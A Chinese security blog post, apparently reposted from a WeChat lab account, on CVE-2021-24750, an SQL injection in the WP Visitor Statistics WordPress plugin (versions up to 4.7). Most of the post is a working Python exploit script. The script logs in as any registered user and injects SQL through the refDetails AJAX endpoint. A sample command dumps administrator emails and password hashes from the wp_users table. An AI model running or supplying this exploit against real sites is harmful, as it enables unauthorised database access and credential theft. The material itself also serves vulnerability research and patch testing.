[EXP]CVE-2021-24750 WordPress Visitor Statistics SQL Inject

admin 2022年7月5日01:32:16评论45 views字数 2249阅读7分29秒阅读模式


简介

WP Visitor Statistics是一个访问者统计插件,允许您在不依赖外部服务的情况下显示您网站上的实时访问者数量,其基本功能包括实时统计、访客位置、IP 地址支持、自动更新等。通过Pro订阅,您可以获得在线计数器,小部件,各种类型的数据的短代码,访问者位置的交互式地图,统计信息的电子邮件报告等。


漏洞信息

版本:<= 4.7
CVE:CVE-2021-24750
条件: 需授权  (用户可自行注册,前掉是目标允许注册,默认不启用注册)


4.8 之前的 WP 访问者统计(实时流量)WordPress 插件无法正确清理和转义 refDetails AJAX 操作中的 refUrl,任何经过身份验证的用户都可以使用,这可能允许角色低至订阅者的用户执行 SQL 注入攻击。


VUL

https://downloads.wordpress.org/plugin/wp-stats-manager.4.7.zip


EXP

import argparseimport requestsfrom datetime import datetime
# User-Input:my_parser = argparse.ArgumentParser(description='Wordpress Plugin WP Visitor Statistics - SQL Injection')my_parser.add_argument('-T', '--IP', type=str)my_parser.add_argument('-P', '--PORT', type=str)my_parser.add_argument('-U', '--PATH', type=str)my_parser.add_argument('-u', '--USERNAME', type=str)my_parser.add_argument('-p', '--PASSWORD', type=str)my_parser.add_argument('-C', '--COMMAND', type=str)args = my_parser.parse_args()target_ip = args.IPtarget_port = args.PORTwp_path = args.PATHusername = args.USERNAMEpassword = args.PASSWORDcommand = args.COMMAND
print('')print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))print('')
# Authentication:session = requests.Session()auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'check = session.get(auth_url)# Header:header = { 'Host': target_ip, 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://' + target_ip, 'Connection': 'close', 'Upgrade-Insecure-Requests': '1'}
# Body:body = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'testcookie': '1'}auth = session.post(auth_url, headers=header, data=body)
# Exploit:exploit_url = 'http://' + target_ip + ':' + target_port + wp_path +'/wp-admin/admin-ajax.php?action=refDetails&requests={"refUrl":"' + "' " + command + '"}'exploit = session.get(exploit_url)print(exploit.text)print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))


漏洞复现

随意注册一个用户,使用EXP执行任意SQL语句,如查询管理员用户密码

python CVE-2021-24750.py -T 192.168.1.2 -P 80 -U /wp582/ -u k8gege -p 123456 -C "union select 1,1,user_email,user_pass from wp_users -- g"


[EXP]CVE-2021-24750 WordPress Visitor Statistics SQL Inject


原文始发于微信公众号(K8实验室):[EXP]CVE-2021-24750 WordPress Visitor Statistics SQL Inject

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月5日01:32:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   [EXP]CVE-2021-24750 WordPress Visitor Statistics SQL Injecthttp://cn-sec.com/archives/1157468.html

发表评论

匿名网友 填写信息